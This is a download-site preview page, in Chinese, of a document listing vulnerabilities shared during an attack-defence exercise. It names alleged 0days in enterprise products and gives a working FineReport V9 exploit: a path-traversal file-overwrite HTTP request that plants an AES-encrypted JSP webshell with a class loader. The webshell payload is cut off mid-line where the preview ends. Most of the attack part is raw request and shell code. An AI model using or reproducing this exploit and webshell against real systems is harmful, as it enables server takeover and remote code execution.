没有合适的资源?快使用搜索试试~ 我知道了~
HW漏洞利用........
需积分: 10 0 下载量 116 浏览量
2022-08-15
20:26:56
上传
评论
收藏 294KB DOCX 举报
温馨提示
试读
8页
HW漏洞利用........
资源推荐
资源详情
资源评论
2021.4.8 情报共享 第一批
exchange、致远、天眼、shiro 存在 0day
金蝶 K3Cloud 命令执行 全版本 前台 默认配置
和信创天云桌面系统命令执行,文件上传 全版本 前台 默认配置
用友 U8Cloud 命令执行
h3c 计算管理平台任意账户添加 2016 年版
红帆 OA 任意文件写入漏洞
启明星辰天清汉马 USG 防火墙存在逻辑缺陷漏洞(CVE 已有)
帆软系统疑似存在 0day,被 RCE。
帆软 V9getshell FineReport V9
注意: 这个漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 jsp 文件进行覆盖 Tomcat
启动帆软后默认存在的 JSP 文 件 : 比如: /tomcat-7.0.96/webapps/ROOT/index.jsp
覆盖 Tomcat 自带 ROOT 目录下的 index.jsp:
POST /WebReport/ReportServer?
op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update .jsp
HTTP/1.1Host: 192.168.169.138:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36Connection:
closeAccept-Au: 0c42b2f264071be0507acea1876c74Content-Type:
text/xml;charset=UTF-8Content-Length: 675 {"__CONTENT__":"<%@page
import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends
ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return
super.defineClass(b,0,b.length);}}%><%if(request.getParameter(\"pass\")!=null) {String
k=(\"\"+UUID.randomUUID()).replace(\"-\",\"\").substring(16);session.putValue(\"u\",k);out.pri
nt(k);return;}Cipher c=Cipher.getInstance(\"AES\");c.init(2,new
SecretKeySpec((session.getValue(\"u\")+\"\").getBytes(),\"AES\"));new
U(this.getClass().getClassLoader()).g(c.doFinal(new
资源评论
TXG_818
- 粉丝: 166
- 资源: 2
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功